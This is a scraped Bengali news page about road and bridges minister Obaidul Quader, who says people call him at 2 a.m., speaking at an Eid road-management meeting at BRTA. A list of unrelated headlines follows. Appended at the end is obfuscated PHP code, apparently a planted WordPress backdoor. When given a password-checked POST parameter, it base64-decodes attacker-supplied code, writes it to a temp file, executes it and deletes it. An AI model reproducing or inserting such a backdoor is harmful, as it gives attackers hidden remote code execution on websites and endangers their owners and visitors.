শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

রাত ২ টাতেও কল আসে ওবায়দুল কাদেরের মোবাইলে!

news-image

ডেস্ক রিপোর্ট : রাত ২টায় রাস্তা থেকে মানুষের ফোন পান বলে জানিয়েছেন সড়ক পরিবহন ও সেতুমন্ত্রী ওবায়দুল কাদের। গতকাল শনিবার রাজধানীর এলেনবাড়ি বিআরটিএ কার্যালয়ে ‘বাস মালিক, শ্রমিক ও বিআরটিএ কর্মকর্তাদের নিয়ে ঈদের সড়ক ব্যবস্থাপনা বিষয়ে বৈঠকে তিনি এমন কথা জানান।

বৈঠকে রাস্তায় যানবাহন চলাচলের খারাপ অবস্থা ইঙ্গিত করে কাদের বলেন, গাড়ি রং সাইডে চলাচলে করে যানজট লাগাচ্ছে। টোলপ্লাজার সামনে একটি গাড়ি বিকল হয়ে পেছনের ৫০০ গাড়িকে যানজটে ফেলে দিচ্ছে।

তিনি বলেন, এবারের ঈদযাত্রায় সড়কে কোন ইঞ্জিনিয়ারিং ত্রুটি নেই; তবে গাড়ির রং সাইডে চলাচল এবং ফিটনেস না থাকায় কিছু দুর্ভোগের সৃষ্টি হচ্ছে। সেতুমন্ত্রী ওবায়দুল কাদের বলেন, কিছু কিছু প্রকৌশলীর কারণে সব প্রকৌশলী কেন দায়ী হবেন? অসাধু প্রকৌশলীদের বিরুদ্ধে ব্যবস্থা নিতে হবে। যেসব ঠিকাদার ঠিকমতো কাজ করেন না, তাঁদের বাদ দিয়ে দিতে হবে।এ সময় বিআরটিএ‘র সভা থেকেই তিনি হাইওয়ে পুলিশের ডিআইজি আতিককে ফোন করেন।

ফোনে পুলিশকে বলেন, কোনো গাড়ি যাতে রং সাইড দিয়ে সড়কে না আসে। আর ফিটনেসবিহীন গাড়িকে মূল সড়কে উঠার আগে আটকে রাখার নির্দেশ দেন হাইওয়ে পুলিশকে।

সভায় উপস্থিত থাকা সড়ক পরিবহন সমিতির মহাসচিব খন্দকার এনায়েতুল্লাহ বলেন, বিআরটিএ’র ম্যাজিস্ট্রেট নিয়মিত অভিযান পরিচালনা করছে এবং তারা এতে সহযোগিতা করছেন। সবকিছু নির্দেশনা্ দিয়ে হয় না, অ্যাকশনও লাগে বলেও যোগ করেন- তিনি।

সিটিং সার্ভিস নীতমালা খুব শিগগিরই হয়ে যাচ্ছে বলেও জানান এ সংক্রান্ত কমিটির সদস্য খন্দকার এনায়েতুল্লাহ। সূত্র: বার্তা ২৪

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}